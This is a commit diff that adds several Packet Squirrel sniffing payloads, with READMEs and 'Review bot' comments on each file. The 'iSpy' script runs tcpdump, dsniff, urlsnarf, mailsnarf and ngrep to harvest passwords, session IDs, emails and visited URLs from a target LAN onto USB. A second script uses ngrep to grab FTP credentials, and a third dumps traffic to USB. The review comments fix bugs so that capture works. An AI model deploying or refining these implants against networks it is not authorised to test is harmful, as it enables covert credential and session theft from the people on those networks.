Update repos for Packet Squirrel Mk 2 release

This commit is contained in:
Mike Kershaw / Dragorn
2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions


@@ -0,0 +1,61 @@
| | |
|:----------------|:---------------------------------------------------------------------------------------------------|
| **Title** | iSpy Passive Intel Gathering |
| **Description** | Launches various tools to sniff out intel data. Payload will run until the button is pressed. |
| **Author** | [infoskirmish.com](http://www.infoskirmish.com) |
| **Version** | 1.0 |
| **Category** | sniffing |
| **Target** | Any |
| **Net Mode** | Any (you choose) |
| Meaning | Color | Description |
|:----------|:-----------------:|:----------------------------|
| SUCCESS: | Blink Green | Payload ended complete |
| CLEAN UP: | Rapid White | Payload is shutting down |
| FAIL: | Blink Red | No USB storage found |
| ATTACK: | Blink Yellow | Payload is loging traffic |
This payload will automate gathering various recon data on whatever passes between it's Ethernet ports. Since all the data log file names are marked with a unique date stamp you can freely move from target to target deploy, gather, collect, move on without fear you are overwriting previous logs.
### **Requirements**
+ USB access to store loot.
### **Setup**
1. Edit the config variables at the top.
The main variables are:
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="br-lan" # Interface to listen on
2) Copy payload.sh into the ~/payloads/switch<n> folder you wish to deploy on.
3) Connect into a target machine with access to the LAN.
4) Set switch to the <n> spot and power up.
5) Leave, get coffee, take a nap while everything is recorded and parsed for future use.
6) When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.
7) When all is done the LED will just go blank. It is now safe to unplug and go about your day.
### **Tasks that are started**
| Task | About |
|:---------|:-----------------------------------------------------------------------------|
|tcpdump | So you have a record of every packet that was TX and RX |
|urlsnarf | So you can see all websites that were visited |
|dsniff | Will attempt to acquire passwords and what not |
|ngrep | On ports 80 and 21 with the filter for common password fields |
|ngrep | On ports 80 and 21 with the filter for common session id fields |
|log.txt | Logs the progress of the payload for easy troubleshooting. |
### **Clean Up**
Once completed (aka when the button is pressed) the payload will automatically parse the TCPDump log file for the following items and store the results in separate files. Note the TCPDump raw pcap file is left unharmed and still freely available for your dissecting pleasure.
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.
+ ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains
+ maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.
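Review bot: the documented default `interface="br-lan"` in the Setup section does not match the payload in this same commit, which sets `interface="lo"`; one of the two should change, since `lo` only sees the Squirrel's own loopback traffic and nothing that crosses the Ethernet ports. The Markdown also needs a blank line between the metadata table and the LED table (the two run together, and the first has an empty header row `| | |`), the Setup list mixes `1.` with `2)` numbering, the mailsnarf task that the payload starts is missing from the task table, and there are typos: `loging` should be `logging`, `it's Ethernet ports` should be `its Ethernet ports`, and `recieved` should be `received`.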


@@ -0,0 +1,187 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.
# Payload will run until the button is pressed.
# Author: infoskirmish.com
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: Any (default: Transparent)
# LEDs
# SUCCESS: Payload ended complete
# FAIL: No USB storage found
lootPath="/mnt/loot/intel" # Path to loot
mode="TRANSPARENT" # Network mode we want to use
interface="lo" # Interface to listen on
Date=$(date +%Y-%m-%d-%H%M) # Date format to use for log files
dsnifflog="dsniff_$Date.log" # DSNiff log file name
urlsnifflog="urlsnarf_$Date.log" # URLSniff log file name
tcpdumplog="tcpdump_$Date.pcap" # TCPDump log file name
httppwdlog="httpPasswords_$Date.pcap" # Potential HTTP password file name
sessionidlog="sessionids_$Date.pcap" # Potential Session IDs file name
mailsnarfLog="mailsnarf_$Date.log" # Mailsnarf data log file path.
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill URLSnarff
echo "URLSnarff ending pid=$1" >> $1/log.txt
kill $1
wait $1
# Kill DNSniff
echo "DNSniff ending pid=$2" >> $2/log.txt
kill $2
wait $2
# Kill TCPDump
echo "TCPDump ending pid=$3" >> $3/log.txt
kill $3
wait $3
# Kill HTTP Password NGREP
echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
kill $4
wait $4
# Kill Session NGREP
echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
kill $5
wait $5
# Kill Mail Snarf
echo "Mail Snarf ending pid=$6" >> $6/log.txt
kill $6
wait $6
# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
# that the payload accepted your button push and is responding. Thus the rapid white blink.
LED W VERYFAST
# Dump all unique IP address from TCP Dump file.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system; turn off LED
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Start tcpdump on the specified interface
tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
tpid=$!
# Log TCP Dump Start
echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
# Start urlsnarff on the specified interface
urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
urlid=$!
# Log URL Snarff Start
echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
# Start dsniff on the specified interface
dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
dsniffid=$!
# Log DSNiff Start
echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
# Log potential plain text user names and passwords on port 80 and 21
# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &
pwdgrep=$!
# Log Password NGREP Start
echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
# Log potential plain text session ids, tokens, etc.
ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
sessiongrep=$!
# Log Session NGREP Start
echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
# Log mailsnarf data
mailsnarf -i $interface $lootPath/$mailsnarflog &
mailsnarfid=$!
# Log mailsnarf Start.
echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
}
# This payload will only run if we have USB storage
if [ -d "/mnt/loot" ]; then
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE $mode >> $lootPath/log.txt
sleep 5
# Lets make sure the interface the user wanted actually exisits.
if [[ $(ifconfig |grep $interface) ]]; then
echo "" > $lootPath/log.txt
LED ATTACK
run &
monitor_space $! &
else
# Interface could not be found; log it in ~/payload/switch1/log.txt
ifconfig > $lootPath/log.txt
echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
# Display FAIL LED
LED FAIL
fi
else
# USB storage could not be found; log it in ~/payload/switch1/log.txt
echo "Could not load USB storage. Stopping..." > log.txt
# Display FAIL LED
LED FAIL
fi
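Review bot: `interface="lo"` at the top contradicts the README's `br-lan` and captures only loopback traffic, so every sniffer started in `run()` records nothing from the bridge; `finish()` also redirects its log lines to `$1/log.txt` through `$6/log.txt` (a PID used as a directory name) instead of `$lootPath/log.txt`, so those echoes fail. Further issues visible in the hunk: the variable is defined as `mailsnarfLog` but used as `$mailsnarflog`, which expands to nothing, and mailsnarf takes no output-file argument in any case (it writes mbox data to stdout), so the extra argument is parsed as a match pattern and no mail log is produced; `NETMODE $mode >> $lootPath/log.txt` runs before `run()` creates `$lootPath`, and `echo "" > $lootPath/log.txt` then truncates whatever was written; and `monitor_space` receives the PID of the `run &` subshell rather than tcpdump's, so the capture keeps writing when storage is nearly full. Suggest `>> $lootPath/log.txt` throughout `finish()`, `mailsnarf -i $interface > $lootPath/$mailsnarfLog &`, and moving `mkdir -p $lootPath` ahead of the `NETMODE` call.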


@@ -0,0 +1,79 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# ngrep payload to snag creds
NGREP_OPTIONS=("-wiql" "user|pass" "port" "21")
CONDITION=""
WCNUM=3
BUTTON_WAIT="5s"
LOOT_DIR="/mnt/loot/ngrep"
LOG_FILE="${LOOT_DIR}/ngrep-${RANDOM}.log"
function syncFS() {
while true
do
sync
sleep 5
done
}
function setup() {
LED OFF
NETMODE TRANSPARENT
sleep 5
mkdir -p $LOOT_DIR
}
function checkLog() {
[[ -z $CONDITION ]] && {
grep -qi $CONDITION $LOG_FILE && {
return 0
}
} || {
[[ $(wc -l < $LOG_FILE) -gt $WCNUM ]] && {
return 0
}
}
return 1
}
function run() {
ngrep "${NGREP_OPTIONS[@]}" 2>&1 > $LOG_FILE &
npid=$!
while true
do
NO_LED=true BUTTON && {
checkLog && {
BUTTON $BUTTON_WAIT && {
LED FINISH
kill $npid
sleep 3
LED OFF
halt
}
} || {
LED FAIL
sleep 3
LED OFF
}
}
done
}
[[ ! -f /mnt/NO_MOUNT ]] && {
setup
syncFS &
run
} || {
LED FAIL
}
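Review bot: `checkLog()` tests `[[ -z $CONDITION ]]` before grepping for `$CONDITION`, which is inverted: when a condition is set, the grep branch is skipped and only the line-count check runs, and when it is empty, `grep -qi $LOG_FILE` runs with the log path as the pattern and reads stdin. It should be `[[ -n $CONDITION ]]`, with `"$CONDITION"` quoted. Also in `run()`, `ngrep ... 2>&1 > $LOG_FILE` sends stderr to the original stdout rather than the log (the order must be `> $LOG_FILE 2>&1`), and `NGREP_OPTIONS` passes no `-d` device, so capture depends on ngrep's default device selection; pass `-d br-lan` explicitly, as the TCPDump payload does with `-i br-lan`.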


@@ -0,0 +1,12 @@
# ngrep payload
Credits: Hak5Darren, Sebkinne
Small Edit: SebSeifert
# Description
Does packet sniffing stuff
If the Button is pressed you have x seconds to push the button one more time. If pressed the payload ends and cleans up. Else it keeps running.
## Options
BUTTON_WAIT = The seconds you can wait until the button must be pressed to end the payload.
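Review bot: the Options section lists only `BUTTON_WAIT`, but the payload also exposes `NGREP_OPTIONS`, `CONDITION`, `WCNUM` and `LOOT_DIR`, and `CONDITION`/`WCNUM` are what decide whether a button press is allowed to end the run; document them, and replace "x seconds" in the description with the variable name and its default (`5s`). "Does packet sniffing stuff" should state what is captured (by default, ngrep matching `user|pass` on port 21 into `/mnt/loot/ngrep`), and `# Description` should be demoted to `##` to match `## Options` rather than being a second top-level heading.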


@@ -0,0 +1,71 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# LEDs
# SUCCESS: Dump complete
# FAIL: No USB storage found
function monitor_space() {
while true
do
[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill TCPDump and sync filesystem
kill $1
wait $1
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p /mnt/loot/tcpdump &> /dev/null
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE TRANSPARENT
sleep 5
# Start tcpdump on the bridge interface
tcpdump -i br-lan -s 0 -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
tpid=$!
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $tpid
}
# This payload will only run if we have USB storage
[[ ! -f /mnt/NO_MOUNT ]] && {
LED ATTACK
run &
monitor_space $! &
} || {
LED FAIL
}
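Review bot: `monitor_space` is handed `$!` of `run &`, i.e. the subshell's PID rather than tcpdump's, so when free space drops below 10000 blocks it kills a subshell that is blocked in `BUTTON` while tcpdump keeps writing; it also only `break`s, with no `halt`, unlike `finish()`. Have `run()` record `$tpid` in a file under `/mnt/loot/tcpdump` that the monitor reads, and call `finish` with that PID from the monitor. Separately, `df | grep /mnt` can match more than one line once something else is mounted under `/mnt`, which turns the `-lt` comparison into a multi-word string and a bash error; `df /mnt | awk 'NR==2{print $4}'` is safer.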